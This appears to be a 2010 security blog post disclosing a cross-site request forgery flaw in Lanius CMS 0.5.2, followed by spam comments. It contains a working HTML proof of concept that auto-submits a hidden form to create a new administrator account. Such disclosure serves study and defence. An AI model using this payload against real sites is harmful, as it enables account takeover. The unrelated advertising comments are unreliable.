This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

Lanius CMS 0.5.2 r1668 Cross-site Request Forgery

A cross-site request forgery vulnerability in Lanius CMS 0.5.2 r1668 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/laniuscms/admin.php?com_option=user">
<input type="hidden" name="task" value="create" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_name" value="a" />
<input type="hidden" name="user_user" value="new_admin" />
<input type="hidden" name="user_email" value="a@a.com" />
<input type="hidden" name="user_lang" value="" />
<input type="hidden" name="user_tz" value="" />
<input type="hidden" name="user_gid" value="5" />
<input type="hidden" name="user_password" value="Password1" />
<input type="hidden" name="user_password1" value="Password1" />
</form>
</body>
</html>

13 comments:

  1. Furthermore, online stores are open 24 × 7 and 365 days a year, so anyone can shop any time and any where. Any person looking for fine wine qualities can choose from immense number of options on several online stores. chevy seat coversKitchen Accessories

    ReplyDelete
  2. An environment friendly hand dryer , designed to be eco friendly and lower your carbon footprint.
    A quieter bathroom hand dryer at approx 65 dba
    A stylish hand dryer with latest design and four different standard colours.

    fast hand dryer>
    russian video chat

    ReplyDelete
  3. Fitness centers and gyms know how to capitalize on the New Year's goals people will be making, you should too! Check into different places and programs to find the best deals of the year.

    aftermarket auto parts
    Der beste Strompreis-Vergleich - Testsieger bei Stiftung Warentest

    ReplyDelete
  4. Each food additive has safe limit value to consume by human and at the same time not give bad effect on human health. The value is determined through a sequential testing.

    kung fu suit
    RO-120

    ReplyDelete
  5. This recipe is a simple recipe combined with all veggie fillings for you and your kids. It will only take you about 10 minutes and below to do this recipe!

    cedar roofing toronto
    binary options brokers

    ReplyDelete
  6. We will repair or replace the glass on the back of your iphone if it is cracked or broken.

    The repair service includes replacement part , fitting and return postage to you

    iphone 4 repair
    wind power generation

    ReplyDelete
  7. The MOS Burger brand originated with its first store in Tokyo, Japan in 1972 and has grown to open over 1500 stores throughout Japan and South East Asia. MOS Burger opened its first Australian store in Brisbane earlier this year. Since then stores have been opening; 2 more stores on the Gold Coast in South East Queensland.

    Mercedes HIDlocation de salles

    ReplyDelete
  8. In any survey that you�ll ever ask international students about what country is their most preferred destination for their study; Australia will always be included on their top list.

    fulvic ionic minerals
    stone veneer

    ReplyDelete
  9. gold coast recording studioCheap VPNpenetrative, however, are a pair of speeches delivered by Nazis—first by Goebbels (Sylvester Groth) and later by Hellstrom—respectively commenting on the unique place blacks have had in America, as athletic competitors and previously as slaves. This threading connects World War II to the black experience in America, and suggests Tarantino's contention that “America,” as an abstraction, or reduced to specific characters (“Basterds”), was not the uncomplicated

    ReplyDelete
  10. During "Tecumseh's War" in 1811, the construction of Fort Harrison during an expedition led by William Henry Harrison marked the known beginning of a permanent population of European-Americans. A Wea village called Weautano (also known as "Rising Sun" and "Old Orchard Town") already existed near the fort. Captain Zachary Taylor defended the fort from a British–inspired attack by an estimated 600 Native Americans during the Battle of Fort Harrison on September 4, 1812.
    bean bags for dogsExcellent service and 100% guarantee on our compatible toners and inks

    ReplyDelete
  11. Yes. This information is useful for me. It useful ... Wish you a nice day.
    dog clothes europemaldives holidays

    ReplyDelete